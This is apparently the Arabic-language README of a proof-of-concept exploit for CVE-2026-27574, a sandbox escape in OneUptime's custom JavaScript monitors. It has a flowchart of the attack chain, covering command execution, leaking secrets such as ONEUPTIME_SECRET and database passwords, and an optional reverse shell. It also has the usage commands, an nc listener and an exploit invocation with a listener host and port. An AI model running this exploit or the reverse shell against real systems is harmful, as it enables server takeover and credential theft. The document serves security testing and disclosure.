
إثبات مفهوم لاستغلال CVE-2026-27574، وهو حقن برمجي خطير في OneUptime يتيح تنفيذ التعليمات البرمجية عن بُعد وتسريب متغيرات البيئة.
تم الإصلاح في: OneUptime 10.0.0 (الترحيل إلى isolated-vm)
نوع الاستغلال: عن بُعد
المصادقة: صلاحيات منخفضة (أي عضو مسجل في المشروع)
الأثر: اختراق كامل للخادم، سرقة بيانات الاعتماد، السيطرة على المجموعة
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
# Start listener (if using reverse shell)
nc -lvnp 4444
# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests (pip install requests)يُقدَّم هذا الكود لأغراض تعليمية واختبارات أمنية مصرّح بها فقط.
الاستخدام غير المصرّح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.
Developed by Mohammed Idrees Banyamer • Jordan • @banyamer_security